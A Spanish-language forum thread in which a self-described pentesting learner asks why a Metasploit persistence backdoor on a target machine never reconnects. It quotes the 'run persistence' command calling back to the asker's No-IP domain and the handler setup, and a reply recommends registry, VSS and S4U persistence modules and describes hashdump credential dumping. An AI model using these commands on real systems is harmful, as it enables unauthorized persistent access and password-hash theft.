Bueno amigos les comento mi problema, yo uso kali linux para practicar pentesting, tengo algunos problemas cuando quiero instalar una persistencia en el computador objetivo para poderme conectar siempre, uso este comando "run persistence -U -i 5 -p 1717 -r (mi dominio en noip)" luego le doy enter y efectivamente me dice que la persistencia se ha instalado correctamente entonces yo en la session meterpreter que tengo abierta escribo reboot para reiniciar la maquina atacada luego abro una nueva ventana de metasploit framework y escribo "use exploit/multi/hanlder" y luego cuando estoy en el exploit escribo "set LHOST (mi dominio en no ip)" y luego pongo "set LPORT 1717" entonces le doy run y me sale esto
- Started reverse TCP handler on 192.168.1.4:1717
- Starting the payload handler...
lo que quiere decir que esta esperando la conexión que ya antes configure con persistencia, pero nunca se conecta siempre se queda asi, yo supongo que si configure bien el cliente de no ip ya que si abro una nueva consola en kali linux y realizo un ping a mi dominio no ip efectivamente me devuelve mi ip, me podrian deicr en que me estoy equivocando ? poruqe no logro que la persistencia funcione si cuando corro el comando para instalar la persistencia me me sale que se ha instalado correctamente ?
antes usaba veil framework para generar los payloads crei que esa era la razon por la que no me funcionaba la persistencia pero acabo de generar uno con msfvenom y tampoco funciona la persistencia.
hola kilerpi
por lo que he visto, haces la persistencia desde la meterpreter (y según mi experiencia de metasploit) algunos comandos en la meterpreter dan lugar a fallos, como por ejemplo, siendo "nt system" (es decir, que has elevado privilegios y anteriormente has hecho el "getsysem"), al escribir el comando "hashdump" me ha arrojado errores, y es ilógico porque esta todo correcto, y eso me llevó a considerar varias alternativas, y acabé mandando la sesión a segundo plano (con "background") y use desde msf el comando "use post/windows/gather/hashdump" y efectivamente funcionó, ahora bien...por que te explico todo esto? porque quiero que veas que hay veces que la meterpreter falla, y nos volvemos locos buscando los errores. Por tanto, dos posibles soluciones con un mismo factor en común, ya citado antes (usar los modulos desde la msf):
* use exploit/windows/local/persistence
* use exploit/windows/local/registry_persistence
* use exploit/windows/local/vss_persistence
* use exploit/windows/local/s4u_persistence
Estos 4 son bastante efectivos, a mi personalmente me gusta (y me funciona) el 2º, ya que el problema que creo que puedes tener es que cuando ejecutas desde la meterpreter el script "run persistence..." (porque es un script), y pienso que puede tender a fallar, pues pienso que puede suceder es que el payload que mandas a anclarse al registro (por eso se llama persistencia, porque se inicia con el registro, eso hay que tenerlo en cuenta) no se engancha correctamente o simplemente no lo hace. Por tanto, con esto creo que la persistencia tendría un buen resultado, ves probando otros metodos y comprobando que se ancla en el registro, espero haberte ayudado,
un saludo! -by secu